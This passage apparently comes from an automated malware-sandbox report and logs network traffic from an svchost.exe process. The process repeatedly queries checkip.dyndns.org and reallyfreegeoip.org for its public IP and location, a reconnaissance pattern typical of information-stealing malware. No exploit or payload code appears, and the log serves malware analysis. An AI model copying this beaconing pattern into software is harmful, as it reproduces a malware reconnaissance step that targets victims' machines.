                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 3, 2025 09:21:24.452219963 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:24 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 3, 2025 09:21:25.559660912 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 3, 2025 09:21:25.772474051 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:25 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.749827132.226.247.73807588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:26.425946951 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 3, 2025 09:21:27.112889051 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:27 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.2.749838132.226.247.73807588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:27.767579079 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 3, 2025 09:21:28.465863943 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:28 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              11192.168.2.749849132.226.247.73807588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:29.102637053 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 3, 2025 09:21:29.795089960 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:29 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              12192.168.2.749858132.226.247.73807588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:30.454052925 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 3, 2025 09:21:31.268237114 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:31 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              13192.168.2.749868132.226.247.73807588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:31.899014950 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 3, 2025 09:21:32.570352077 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:32 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              14192.168.2.749879132.226.247.73807588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:33.196249008 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 3, 2025 09:21:33.866344929 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:33 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              15192.168.2.749888132.226.247.73807588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:34.486572027 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 3, 2025 09:21:35.158082962 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:35 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.749720188.114.96.34437344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:13 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-03 08:21:13 UTC859INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:13 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207262
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0JCmJwG8Ap2rI1x1zdVb82d8q3FXGcbUNT3npM6BxLyh2lLGg3P0KS3VtAy%2BshS8fhvXHOWANVp%2ByAI04dUohR1l%2FdTXyNLBw%2FGLO35O6HluVytzoBlBrI8Hb5GLlwRDr%2FZrQAJs"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc192f60f2a43ef-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1601&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1792510&cwnd=237&unsent_bytes=0&cid=8b6a50fdba05e91b&ts=334&x=0"
                                                                                                              2025-01-03 08:21:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.749727188.114.96.34437344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:14 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-03 08:21:14 UTC855INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:14 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207263
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tZTVDvQ9R6h27N9tsexVe1VuGPkKUP9%2Bpxb%2FL4VtUuD30mWLWSSahCCqgQ4GyckG84eSxz1kxxQH%2BTO5ZFasSC09D1rlmy3VR78WW46bbf83qLQqUyDzScY1tcYhkxTk0QVrMvyM"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc192ff0c3f4291-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2154&min_rtt=2145&rtt_var=822&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1317095&cwnd=207&unsent_bytes=0&cid=581202ccbf6867e9&ts=155&x=0"
                                                                                                              2025-01-03 08:21:14 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.749738188.114.96.34437344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:15 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-03 08:21:16 UTC849INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:16 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207265
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=47Lo74t2PWpDaJc9Bn1SuxGcz9ba1hsyMBBWY0VkahWhREZtTB3pacQx1BU8UfL8ZDjP2zOnWXqsUuaRfpsQcTmIKycmXzwF864QYo2F4djN6RpIFBi0hFta4KGsUB7CBUoJ78qj"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc193073938729b-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1889&min_rtt=1876&rtt_var=730&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1471774&cwnd=249&unsent_bytes=0&cid=1f48f6334a5840c2&ts=157&x=0"
                                                                                                              2025-01-03 08:21:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.749746188.114.96.34437344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:17 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-03 08:21:17 UTC857INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:17 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207266
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GFkrQaVaD7sdEn2XbbSS%2FlbLJzuA5QGP92DPNYgMeBu2WgNt4f4lV2q1yXgDQJ8aTpBuLXa604%2FJ0R7IM5rkBUh6Jw2XlYbsgSqWRenCmB5w7B4%2F7hJWXcXGFOQK3ZRdNiYqs%2Fh4"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc1930f5f8d0f6d-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1670&rtt_var=629&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1734997&cwnd=239&unsent_bytes=0&cid=c137778b55f4cf7e&ts=144&x=0"
                                                                                                              2025-01-03 08:21:17 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.749758188.114.96.34437344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:18 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-03 08:21:18 UTC855INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:18 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207267
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ut9U2MTn3jZJpWgDGYmPR4m5f%2FC5PKUfkQfYcUa395m9KWBvL1%2FwfgA6fCVgTQS1m8nMrmJsqwB9ytC04LE8e0KjMl4aecukKzkHrIfoywSR5TLTxa0j%2Bjw6MVZvISiSaIaHObvK"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fc193177f31de96-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1583&rtt_var=624&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1844598&cwnd=224&unsent_bytes=0&cid=d63d53db9223553d&ts=139&x=0"
                                                                                                              2025-01-03 08:21:18 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.749768188.114.96.34437344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-03 08:21:19 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-03 08:21:20 UTC857INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:19 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1207269
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k5t8gu1eQwP75JmCRwlZZa2bcDybHBm1dYN3n%2BcVPoulSYr4g8oC7Y4YrLpScETGDkrKvob077advJB4TkuIBwq%2FC%2Fc7jFsQTONFo82bcc290DwDU94WTHNh2nLJkLqASl%2BmTFch"}],"group":"cf-nel","max_age":604800}
